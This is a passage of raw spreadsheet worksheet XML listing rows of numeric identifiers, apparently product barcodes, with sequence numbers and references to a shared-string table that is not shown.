      <c r="E36" t="s">
        <v>14239</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>100</v>
      </c>
      <c r="B37">
        <v>9120203590631</v>
      </c>
      <c r="D37">
        <v>36</v>
      </c>
      <c r="E37" t="s">
        <v>14240</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>101</v>
      </c>
      <c r="B38">
        <v>8120116081128</v>
      </c>
      <c r="D38">
        <v>37</v>
      </c>
      <c r="E38" t="s">
        <v>14241</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>102</v>
      </c>
      <c r="B39">
        <v>8120001852996</v>
      </c>
      <c r="D39">
        <v>38</v>
      </c>
      <c r="E39" t="s">
        <v>14242</v>
      </c>
    </row>
    <row r="40" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>104</v>
      </c>
      <c r="B40" t="s">
        <v>14299</v>
      </c>
      <c r="D40">
        <v>39</v>
      </c>
      <c r="E40" t="s">
        <v>14243</v>
      </c>
    </row>
    <row r="41" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>105</v>
      </c>
      <c r="B41">
        <v>8120215012028</v>
      </c>
      <c r="D41">
        <v>40</v>
      </c>
      <c r="E41" t="s">
        <v>14244</v>
      </c>
    </row>
    <row r="42" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>107</v>
      </c>
      <c r="B42">
        <v>8120006930063</v>
      </c>
      <c r="D42">
        <v>41</v>
      </c>
      <c r="E42" t="s">
        <v>14245</v>
      </c>
    </row>
    <row r="43" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>108</v>
      </c>
      <c r="B43">
        <v>8120006842313</v>
      </c>
      <c r="D43">
        <v>42</v>
      </c>
      <c r="E43" t="s">
        <v>14246</v>
      </c>
    </row>
    <row r="44" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>110</v>
      </c>
      <c r="B44">
        <v>8120307800816</v>
      </c>
      <c r="D44">
        <v>43</v>
      </c>
      <c r="E44" t="s">
        <v>14247</v>
      </c>
    </row>
    <row r="45" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>111</v>
      </c>
      <c r="B45">
        <v>8120102950466</v>
      </c>
      <c r="D45">
        <v>44</v>
      </c>
      <c r="E45" t="s">
        <v>14247</v>
      </c>
    </row>
    <row r="46" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>112</v>
      </c>
      <c r="B46">
        <v>8120110032667</v>
      </c>
      <c r="D46">
        <v>45</v>
      </c>
      <c r="E46" t="s">
        <v>14216</v>
      </c>
    </row>
    <row r="47" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>114</v>
      </c>
      <c r="B47">
        <v>9120207192543</v>
      </c>
      <c r="D47">
        <v>46</v>
      </c>
      <c r="E47" t="s">
        <v>14248</v>
      </c>
    </row>
    <row r="48" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>116</v>
      </c>
      <c r="B48">
        <v>8120004791485</v>
      </c>
      <c r="D48">
        <v>47</v>
      </c>
      <c r="E48" t="s">
        <v>14249</v>
      </c>
    </row>
    <row r="49" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>117</v>
      </c>
      <c r="B49">
        <v>8120109782177</v>
      </c>
      <c r="D49">
        <v>48</v>
      </c>
      <c r="E49" t="s">
        <v>14250</v>
      </c>
    </row>
    <row r="50" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>119</v>
      </c>
      <c r="B50">
        <v>9120016070238</v>
      </c>
      <c r="D50">
        <v>49</v>
      </c>
      <c r="E50" t="s">
        <v>14251</v>
      </c>
    </row>
    <row r="51" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>124</v>
      </c>
      <c r="B51">
        <v>8120106723018</v>
      </c>
      <c r="D51">
        <v>50</v>
      </c>
      <c r="E51" t="s">
        <v>14252</v>
      </c>
    </row>
    <row r="52" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>2719</v>
      </c>
      <c r="B52">
        <v>8120000711862</v>
      </c>
      <c r="D52">
        <v>51</v>
      </c>
      <c r="E52" t="s">
        <v>14253</v>
      </c>
    </row>
    <row r="53" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>128</v>
      </c>
      <c r="B53">
        <v>9120201311491</v>
      </c>
      <c r="D53">
        <v>52</v>
      </c>
      <c r="E53" t="s">
        <v>14254</v>
      </c>
    </row>
    <row r="54" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>129</v>
      </c>
      <c r="B54">
        <v>8120311042039</v>
      </c>
      <c r="D54">
        <v>53</v>
      </c>
      <c r="E54" t="s">
        <v>14255</v>
      </c>
    </row>
    <row r="55" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>131</v>
      </c>
      <c r="B55">
        <v>9120003152007</v>
      </c>
      <c r="D55">
        <v>54</v>
      </c>
      <c r="E55" t="s">
        <v>14256</v>
      </c>
    </row>
    <row r="56" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>133</v>
      </c>
      <c r="B56">
        <v>9120309382514</v>
      </c>
      <c r="D56">
        <v>55</v>
      </c>
      <c r="E56" t="s">
        <v>14257</v>
      </c>
    </row>
    <row r="57" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>136</v>
      </c>
      <c r="B57">
        <v>8120218280033</v>
      </c>
      <c r="D57">
        <v>56</v>
      </c>
      <c r="E57" t="s">
        <v>14258</v>
      </c>
    </row>
    <row r="58" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>137</v>
      </c>
      <c r="B58">
        <v>8120004930669</v>
      </c>
      <c r="D58">
        <v>57</v>
      </c>
      <c r="E58" t="s">
        <v>14259</v>
      </c>
    </row>
    <row r="59" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>138</v>
      </c>
      <c r="B59">
        <v>8120303860223</v>
      </c>
      <c r="D59">
        <v>58</v>
      </c>
      <c r="E59" t="s">
        <v>14260</v>
      </c>
    </row>
    <row r="60" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>146</v>
      </c>
      <c r="B60">
        <v>9120007332059</v>
      </c>
      <c r="D60">
        <v>59</v>
      </c>
      <c r="E60" t="s">
        <v>14260</v>
      </c>
    </row>
    <row r="61" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>154</v>
      </c>
      <c r="B61">
        <v>32884</v>
      </c>
      <c r="D61">
        <v>60</v>
      </c>
      <c r="E61" t="s">
        <v>14260</v>
      </c>
    </row>
    <row r="62" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>155</v>
      </c>
      <c r="B62">
        <v>32319</v>
      </c>
      <c r="D62">
        <v>61</v>
      </c>
      <c r="E62" t="s">
        <v>14261</v>
      </c>
    </row>
    <row r="63" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>158</v>
      </c>
      <c r="B63">
        <v>8120212241415</v>
      </c>
      <c r="D63">
        <v>62</v>
      </c>
      <c r="E63">
        <v>17759689005000</v>
      </c>
    </row>
    <row r="64" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>159</v>
      </c>
      <c r="B64">
        <v>8120006810692</v>
      </c>
      <c r="D64">
        <v>63</v>
      </c>
      <c r="E64" t="s">
        <v>14262</v>
      </c>
    </row>
    <row r="65" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>160</v>
      </c>
      <c r="B65">
        <v>220107850531</v>
      </c>
      <c r="D65">
        <v>64</v>
      </c>
      <c r="E65">
        <v>17759689005000</v>
      </c>
    </row>
    <row r="66" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>161</v>
      </c>
      <c r="B66">
        <v>8120001731911</v>
      </c>
      <c r="D66">
        <v>65</v>
      </c>
      <c r="E66" t="s">
        <v>14263</v>
      </c>
    </row>
    <row r="67" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>162</v>
      </c>
      <c r="B67">
        <v>9120306111607</v>
      </c>
      <c r="D67">
        <v>66</v>
      </c>
      <c r="E67" t="s">
        <v>14264</v>
      </c>
    </row>
    <row r="68" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>168</v>
      </c>
      <c r="B68">
        <v>8120312003004</v>
      </c>
      <c r="D68">
        <v>67</v>
      </c>
      <c r="E68" t="s">
        <v>14265</v>
      </c>
    </row>
    <row r="69" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>170</v>
      </c>
      <c r="B69">
        <v>22965</v>
      </c>
      <c r="D69">
        <v>68</v>
      </c>
      <c r="E69" t="s">
        <v>14266</v>
      </c>
    </row>
    <row r="70" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>2729</v>
      </c>
      <c r="B70">
        <v>8120000711862</v>
      </c>
      <c r="D70">
        <v>69</v>
      </c>
      <c r="E70" t="s">
        <v>14267</v>
      </c>
    </row>
    <row r="71" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>175</v>
      </c>
      <c r="B71">
        <v>9120201121365</v>
      </c>
      <c r="D71">
        <v>70</v>
      </c>
      <c r="E71" t="s">
        <v>14268</v>
      </c>
    </row>
    <row r="72" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>176</v>
      </c>
      <c r="B72">
        <v>8120004862383</v>
      </c>
      <c r="D72">
        <v>71</v>
      </c>
      <c r="E72" t="s">
        <v>14269</v>
      </c>
    </row>
    <row r="73" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>177</v>
      </c>
      <c r="B73">
        <v>8120216092346</v>
      </c>
      <c r="D73">
        <v>72</v>
      </c>
      <c r="E73" t="s">
        <v>14270</v>
      </c>
    </row>
    <row r="74" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>181</v>
      </c>
      <c r="B74">
        <v>8120005840218</v>
      </c>
      <c r="D74">
        <v>73</v>
      </c>
      <c r="E74" t="s">
        <v>14271</v>
      </c>
    </row>
    <row r="75" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>182</v>
      </c>
      <c r="B75">
        <v>8120108960275</v>
      </c>
      <c r="D75">
        <v>74</v>
      </c>
      <c r="E75" t="s">
        <v>14272</v>
      </c>
    </row>
    <row r="76" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>184</v>
      </c>
      <c r="B76">
        <v>8120005871564</v>
      </c>
      <c r="D76">
        <v>75</v>
      </c>
      <c r="E76" t="s">
        <v>14273</v>
      </c>
    </row>
    <row r="77" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>185</v>
      </c>
      <c r="B77">
        <v>8120206830312</v>
      </c>
      <c r="D77">
        <v>76</v>
      </c>
      <c r="E77" t="s">
        <v>14274</v>
      </c>
    </row>
    <row r="78" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>186</v>
      </c>
      <c r="B78">
        <v>8120201712078</v>
      </c>
      <c r="D78">
        <v>77</v>
      </c>
      <c r="E78" t="s">
        <v>14275</v>
      </c>
    </row>
    <row r="79" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>190</v>
      </c>
      <c r="B79">
        <v>8120007870315</v>
      </c>
      <c r="D79">
        <v>78</v>
      </c>
      <c r="E79" t="s">
        <v>14276</v>
      </c>
    </row>
    <row r="80" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>192</v>
      </c>
      <c r="B80">
        <v>9120101811405</v>
      </c>
      <c r="D80">
        <v>79</v>
      </c>
      <c r="E80" t="s">
        <v>14277</v>
      </c>
    </row>
    <row r="81" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>193</v>
      </c>
      <c r="B81">
        <v>8120000821515</v>
      </c>
      <c r="D81">
        <v>80</v>
      </c>
      <c r="E81" t="s">
        <v>14278</v>
      </c>
    </row>
    <row r="82" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>194</v>
      </c>
      <c r="B82">
        <v>8120002792833</v>
      </c>
      <c r="D82">
        <v>81</v>
      </c>
      <c r="E82" t="s">
        <v>14279</v>
      </c>
    </row>
    <row r="83" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>197</v>
      </c>
      <c r="B83">
        <v>9120508792239</v>
      </c>
      <c r="D83">
        <v>82</v>
      </c>
      <c r="E83" t="s">
        <v>14280</v>
      </c>
    </row>
    <row r="84" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>199</v>
      </c>
      <c r="B84">
        <v>8120002841036</v>
      </c>
      <c r="D84">
        <v>83</v>
      </c>
      <c r="E84" t="s">
        <v>14281</v>
      </c>
    </row>
    <row r="85" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>200</v>
      </c>
      <c r="B85">
        <v>9120402292212</v>
      </c>
      <c r="D85">
        <v>2722</v>
      </c>
      <c r="E85" t="s">
        <v>14282</v>
      </c>
    </row>
    <row r="86" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>204</v>
      </c>
      <c r="B86">
        <v>8120102972575</v>
      </c>
      <c r="D86">
        <v>85</v>
      </c>
      <c r="E86" t="s">
        <v>14283</v>
      </c>
    </row>
    <row r="87" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>205</v>
      </c>
      <c r="B87">
        <v>8120003871549</v>
      </c>
      <c r="D87">
        <v>86</v>
      </c>
      <c r="E87" t="s">
        <v>14284</v>
      </c>
    </row>
    <row r="88" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>207</v>
      </c>
      <c r="B88">
        <v>8120212241415</v>
      </c>
      <c r="D88">
        <v>87</v>
      </c>
      <c r="E88" t="s">
        <v>14285</v>
      </c>
    </row>
    <row r="89" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>208</v>
      </c>
      <c r="B89">
        <v>8120000880915</v>
      </c>
      <c r="D89">
        <v>88</v>
      </c>
      <c r="E89" t="s">
        <v>14286</v>
      </c>
    </row>
    <row r="90" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>210</v>
      </c>
      <c r="B90">
        <v>8120108823315</v>
      </c>
      <c r="D90">
        <v>89</v>
      </c>
      <c r="E90" t="s">
        <v>14287</v>
      </c>
    </row>
    <row r="91" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>211</v>
      </c>
      <c r="B91">
        <v>8120004791485</v>
      </c>
      <c r="D91">
        <v>90</v>
      </c>
      <c r="E91" t="s">
        <v>14282</v>
      </c>
    </row>
    <row r="92" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>213</v>
      </c>
      <c r="B92">
        <v>8120103783113</v>
      </c>
      <c r="D92">
        <v>91</v>
      </c>
      <c r="E92" t="s">
        <v>14237</v>
      </c>
    </row>
    <row r="93" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>219</v>
      </c>
      <c r="B93">
        <v>8120411101949</v>
      </c>
      <c r="D93">
        <v>92</v>
      </c>
      <c r="E93" t="s">
        <v>14288</v>
      </c>
    </row>
    <row r="94" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>224</v>
      </c>
      <c r="B94">
        <v>8120210221782</v>
      </c>
      <c r="D94">
        <v>93</v>
      </c>
      <c r="E94" t="s">
        <v>14282</v>
      </c>
    </row>
    <row r="95" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>229</v>
      </c>
      <c r="B95">
        <v>9120004171711</v>
      </c>
      <c r="D95">
        <v>94</v>
      </c>
      <c r="E95" t="s">
        <v>14289</v>
      </c>
    </row>
    <row r="96" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>230</v>
      </c>
      <c r="B96">
        <v>8120019130395</v>
      </c>
      <c r="D96">
        <v>95</v>
      </c>
      <c r="E96" t="s">
        <v>14290</v>
      </c>
    </row>
    <row r="97" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>231</v>
      </c>
      <c r="B97">
        <v>8120009890233</v>
      </c>
      <c r="D97">
        <v>96</v>
      </c>
      <c r="E97" t="s">
        <v>14291</v>
      </c>
    </row>
    <row r="98" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>234</v>
      </c>
      <c r="B98">
        <v>8120107850022</v>
      </c>
      <c r="D98">
        <v>97</v>
      </c>
      <c r="E98" t="s">
        <v>14291</v>
      </c>
    </row>
    <row r="99" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>235</v>
      </c>
      <c r="B99">
        <v>8120011092664</v>
      </c>
      <c r="D99">
        <v>98</v>
      </c>
      <c r="E99" t="s">
        <v>14292</v>
      </c>
    </row>
    <row r="100" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>236</v>
      </c>
      <c r="B100">
        <v>8120008802502</v>
      </c>
      <c r="D100">
        <v>99</v>
      </c>
      <c r="E100" t="s">
        <v>14293</v>
      </c>
    </row>
    <row r="101" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>237</v>
      </c>
      <c r="B101">
        <v>8120013210781</v>
      </c>
      <c r="D101">
        <v>100</v>
      </c>
      <c r="E101" t="s">
        <v>14294</v>
      </c>
    </row>
    <row r="102" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>240</v>
      </c>
      <c r="B102">
        <v>8120111021183</v>
      </c>
      <c r="D102">
        <v>101</v>
      </c>
      <c r="E102" t="s">
        <v>14295</v>
      </c>
    </row>
    <row r="103" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>242</v>
      </c>
      <c r="B103">
        <v>8120104811249</v>
      </c>
      <c r="D103">
        <v>102</v>
      </c>
      <c r="E103" t="s">
        <v>14296</v>
      </c>
    </row>
    <row r="104" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>243</v>
      </c>
      <c r="B104">
        <v>8120019130395</v>
      </c>
      <c r="D104">
        <v>103</v>
      </c>
      <c r="E104" t="s">
        <v>14297</v>
      </c>
    </row>
    <row r="105" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>245</v>
      </c>
      <c r="B105">
        <v>9120003160155</v>
      </c>
      <c r="D105">
        <v>104</v>
      </c>
      <c r="E105" t="s">
        <v>14298</v>
      </c>
    </row>
    <row r="106" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>246</v>
      </c>
      <c r="B106">
        <v>8120019130395</v>
      </c>
      <c r="D106">
        <v>105</v>
      </c>
      <c r="E106" t="s">
        <v>14300</v>
      </c>
    </row>
    <row r="107" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>247</v>
      </c>
      <c r="B107">
        <v>8120019130395</v>
      </c>
      <c r="D107">
        <v>106</v>
      </c>
      <c r="E107" t="s">
        <v>14301</v>
      </c>
    </row>
    <row r="108" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>248</v>
      </c>
      <c r="B108">
        <v>8120019130395</v>
      </c>
      <c r="D108">
        <v>107</v>
      </c>
      <c r="E108" t="s">
        <v>14302</v>
      </c>
    </row>
    <row r="109" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>251</v>
      </c>
      <c r="B109">
        <v>8120103821655</v>
      </c>
      <c r="D109">
        <v>108</v>
      </c>
      <c r="E109" t="s">
        <v>14303</v>
      </c>
    </row>
    <row r="110" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>252</v>
      </c>
      <c r="B110">
        <v>8120301820812</v>
      </c>
      <c r="D110">
        <v>4776</v>
      </c>
      <c r="E110" t="s">
        <v>14304</v>
      </c>
    </row>
    <row r="111" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>253</v>
      </c>
      <c r="B111">
        <v>8120006800439</v>
      </c>
      <c r="D111">
        <v>110</v>
      </c>
      <c r="E111" t="s">
        <v>14305</v>
      </c>
    </row>
    <row r="112" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>254</v>
      </c>
      <c r="B112">
        <v>9120006150045</v>
      </c>
      <c r="D112">
        <v>111</v>
      </c>
      <c r="E112" t="s">
        <v>14306</v>
      </c>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>258</v>
      </c>
      <c r="B113">
        <v>9120203571503</v>
      </c>
      <c r="D113">
        <v>112</v>
      </c>
      <c r="E113" t="s">
        <v>14307</v>
      </c>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>259</v>
      </c>
      <c r="B114">
        <v>9120202591664</v>
      </c>
      <c r="D114">
        <v>113</v>
      </c>
      <c r="E114" t="s">
        <v>14308</v>
      </c>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>260</v>
      </c>
      <c r="B115">
        <v>8120107902909</v>
      </c>
      <c r="D115">
        <v>114</v>
      </c>
      <c r="E115" t="s">
        <v>14309</v>
      </c>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>261</v>
      </c>
      <c r="B116">
        <v>8120106862498</v>
      </c>
      <c r="D116">
        <v>115</v>
      </c>
      <c r="E116" t="s">
        <v>14310</v>
      </c>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>264</v>
      </c>
      <c r="B117">
        <v>8120019092935</v>
      </c>
      <c r="D117">
        <v>116</v>
      </c>
      <c r="E117" t="s">
        <v>14311</v>
      </c>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>266</v>
      </c>
      <c r="B118">
        <v>8120001731819</v>
      </c>
      <c r="D118">
        <v>117</v>
      </c>
      <c r="E118" t="s">
        <v>14312</v>
      </c>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>268</v>
      </c>
      <c r="B119">
        <v>8120005851731</v>
      </c>
      <c r="D119">
        <v>118</v>
      </c>
      <c r="E119" t="s">
        <v>14313</v>
      </c>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>269</v>
      </c>
      <c r="B120">
        <v>8120214271874</v>
      </c>
      <c r="D120">
        <v>119</v>
      </c>
      <c r="E120" t="s">
        <v>14314</v>
      </c>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>270</v>
      </c>
      <c r="B121">
        <v>8120206860396</v>
      </c>
      <c r="D121">
        <v>120</v>
      </c>
      <c r="E121" t="s">
        <v>14315</v>
      </c>
    </row>
    <row r="122" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>272</v>
      </c>
      <c r="B122">
        <v>9120307462397</v>
      </c>
      <c r="D122">
        <v>121</v>
      </c>
      <c r="E122" t="s">
        <v>14316</v>
      </c>
    </row>
    <row r="123" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>4774</v>
      </c>
      <c r="B123">
        <v>8120202990554</v>
      </c>
      <c r="D123">
        <v>122</v>
      </c>
      <c r="E123" t="s">
        <v>14317</v>
      </c>
    </row>
    <row r="124" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>274</v>
      </c>
      <c r="B124">
        <v>9120001592276</v>
      </c>
      <c r="D124">
        <v>123</v>
      </c>
      <c r="E124" t="s">
        <v>14318</v>
      </c>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>275</v>
      </c>
      <c r="B125">
        <v>8120203962304</v>
      </c>
      <c r="D125">
        <v>124</v>
      </c>
      <c r="E125" t="s">
        <v>14319</v>
      </c>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>276</v>
      </c>
      <c r="B126">
        <v>8120119072991</v>
      </c>
      <c r="D126">
        <v>2719</v>
      </c>
      <c r="E126" t="s">
        <v>14320</v>
      </c>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>278</v>
      </c>
      <c r="B127">
        <v>8120002881639</v>
      </c>
      <c r="D127">
        <v>126</v>
      </c>
      <c r="E127" t="s">
        <v>14321</v>
      </c>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>279</v>
      </c>
      <c r="B128">
        <v>8120015081591</v>
      </c>
      <c r="D128">
        <v>127</v>
      </c>
      <c r="E128" t="s">
        <v>14321</v>
      </c>
    </row>
    <row r="129" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>285</v>
      </c>
      <c r="B129">
        <v>8120006952712</v>
      </c>
      <c r="D129">
        <v>128</v>
      </c>
      <c r="E129" t="s">
        <v>14322</v>
      </c>
    </row>
    <row r="130" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>286</v>
      </c>
      <c r="B130">
        <v>8120002811685</v>
      </c>
      <c r="D130">
        <v>129</v>
      </c>
      <c r="E130" t="s">
        <v>14323</v>
      </c>
    </row>
    <row r="131" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>290</v>
      </c>
      <c r="B131">
        <v>8120000711625</v>
      </c>
      <c r="D131">
        <v>130</v>
      </c>
      <c r="E131" t="s">
        <v>14324</v>
      </c>
    </row>
    <row r="132" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>295</v>
      </c>
      <c r="B132">
        <v>9120108170524</v>
      </c>
      <c r="D132">
        <v>131</v>
      </c>
      <c r="E132" t="s">
        <v>14325</v>
      </c>
    </row>
    <row r="133" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>296</v>
      </c>
      <c r="B133">
        <v>8120110150174</v>
      </c>
      <c r="D133">
        <v>132</v>
      </c>
      <c r="E133" t="s">
        <v>14326</v>
      </c>
    </row>
    <row r="134" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>300</v>
      </c>
      <c r="B134">
        <v>81200079100152</v>
      </c>
      <c r="D134">
        <v>133</v>
      </c>
      <c r="E134" t="s">
        <v>14327</v>
      </c>
    </row>
    <row r="135" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>302</v>
      </c>
      <c r="B135">
        <v>8120001762634</v>
      </c>
      <c r="D135">
        <v>134</v>
      </c>
      <c r="E135" t="s">
        <v>14328</v>
      </c>
    </row>
    <row r="136" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>304</v>
      </c>
      <c r="B136">
        <v>8120002762444</v>
      </c>
      <c r="D136">
        <v>135</v>
      </c>
      <c r="E136" t="s">
        <v>14329</v>
      </c>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>305</v>
      </c>
      <c r="B137">
        <v>8120201810775</v>
      </c>
      <c r="D137">
        <v>136</v>
      </c>
      <c r="E137" t="s">
        <v>14330</v>
      </c>
    </row>
    <row r="138" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>306</v>
      </c>
      <c r="B138">
        <v>8120004850512</v>
      </c>
      <c r="D138">
        <v>137</v>
      </c>
      <c r="E138" t="s">
        <v>14331</v>
      </c>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>309</v>
      </c>
      <c r="B139">
        <v>9120207372677</v>
      </c>
      <c r="D139">
        <v>138</v>
      </c>
      <c r="E139" t="s">
        <v>14274</v>
      </c>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>315</v>
      </c>
      <c r="B140">
        <v>8120106843304</v>
      </c>
      <c r="D140">
        <v>139</v>
      </c>
      <c r="E140" t="s">
        <v>14276</v>
      </c>
    </row>
    <row r="141" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>318</v>
      </c>
      <c r="B141">
        <v>8120114011174</v>
      </c>
      <c r="D141">
        <v>140</v>
      </c>
      <c r="E141" t="s">
        <v>14332</v>
      </c>
    </row>
    <row r="142" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>330</v>
      </c>
      <c r="B142">
        <v>8120000711849</v>
      </c>
      <c r="D142">
        <v>141</v>
      </c>
      <c r="E142" t="s">
        <v>14333</v>
      </c>
    </row>
    <row r="143" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>332</v>
      </c>
      <c r="B143">
        <v>9120009291124</v>
      </c>
      <c r="D143">
        <v>142</v>
      </c>
      <c r="E143" t="s">
        <v>14334</v>
      </c>
    </row>
    <row r="144" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>346</v>
      </c>
      <c r="B144">
        <v>8120100961141</v>
      </c>
      <c r="D144">
        <v>143</v>
      </c>
      <c r="E144" t="s">
        <v>14335</v>
      </c>
    </row>
    <row r="145" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>347</v>
      </c>
      <c r="B145">
        <v>8120103950559</v>
      </c>
      <c r="D145">
        <v>144</v>
      </c>
      <c r="E145" t="s">
        <v>14336</v>
      </c>
    </row>
    <row r="146" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>348</v>
      </c>
      <c r="B146">
        <v>8120105882036</v>
      </c>
      <c r="D146">
        <v>145</v>
      </c>
      <c r="E146" t="s">
        <v>14337</v>
      </c>
    </row>
